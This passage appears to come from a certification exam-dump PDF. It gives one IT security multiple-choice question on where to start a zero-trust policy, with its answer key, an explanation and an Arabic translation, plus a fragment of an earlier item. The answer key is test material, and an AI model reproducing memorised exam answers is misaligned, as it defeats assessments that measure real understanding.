‫ تستخدم الشركة إصدارا‬.‫للويب على جهاز التوجيه لإعادة توجيه جميع المنافذ بحيث يكون الخادم قابلا للعرض من الإنترنت‬
.‫قديما من برامج الجهات الخارجية لإدارة موقع الويب‬
.‫الأصول لم يتم تصحيحها أبدا‬
.)‫أي من الآتي يجب القيام به لمنع حدوث هجوم كهذا مرة أخرى؟ (حدد ثلاثة‬
.‫استخدم أحدث إصدار من البرنامج‬
.‫تنفيذ شبكة فرعية تم فحصها لخادم الويب‬
.‫قم بتثبيت حل أمان نقطة النهاية‬
267 / 198
The safer , easier way to help you pass any IT exams.
461.An organization recently released a zero-trust policy that will enforce who is able to remotely access
certain data. Authenticated users who access the data must have a need to know, depending on their
level of permissions.
Which of the following is the first step the organization should take when implementing the policy?
A. Determine a quality CASB solution.
B. Configure the DLP policies by user groups.
C. Implement agentless NAC on boundary devices.
D. Classify all data on the file servers.
Answer: D
Explanation:
zero trust is a security strategy that assumes breach and verifies each request as though it originates
from an untrusted network12. A zero trust policy is a set of “allow rules” that specify conditions for
accessing certain resources3.
According to one source4, the first step in implementing a zero trust policy is to identify and classify all
data and assets in the organization. This helps to determine the level of sensitivity and risk associated
with each resource and apply appropriate access controls. Classifying all data on the file servers is the
first step in implementing a zero trust policy because it helps to determine the level of sensitivity and risk
associated with each resource and apply appropriate access controls.
.‫ وأصدرت إحدى المنظمات مؤخرا سياسة انعدام الثقة التي ستفرض على من يمكنه الوصول عن بعد إلى بيانات معينة‬-461
‫ أي مما‬.‫ اعتمادا على مستوى أذوناتهم‬، ‫يجب أن يحتاج المستخدمون المصادق عليهم الذين يصلون إلى البيانات إلى المعرفة‬
‫يلي هو الخطوة الأولى التي يجب على المنظمة اتخاذها عند تنفيذ السياسة؟ تصنيف جميع البيانات الموجودة على خوادم‬
.‫الملفات‬
.12‫ الثقة المعدومة هي استراتيجية أمان تفترض الخرق وتتحقق من كل طلب كما لو كان ناشئا عن شبكة غير موثوق بها‬:‫تفسير‬
، 4‫ وفقا لأحد المصادر‬.3‫سياسة انعدام الثقة هي مجموعة من "قواعد السماح" التي تحدد شروط الوصول إلى موارد معينة‬
‫ يساعد هذا‬.‫فإن الخطوة الأولى في تنفيذ سياسة الثقة المعدومة هي تحديد وتصنيف جميع البيانات والأصول في المنظمة‬
‫ يعد تصنيف جميع البيانات‬.‫في تحديد مستوى الحساسية والمخاطر المرتبطة بكل مورد وتطبيق ضوابط الوصول المناسبة‬
‫الموجودة على خوادم الملفات الخطوة الأولى في تنفيذ سياسة الثقة المعدومة لأنها تساعد على تحديد مستوى الحساسية‬
.‫والمخاطر المرتبطة بكل مورد وتطبيق ضوابط الوصول المناسبة‬
268 / 198
Download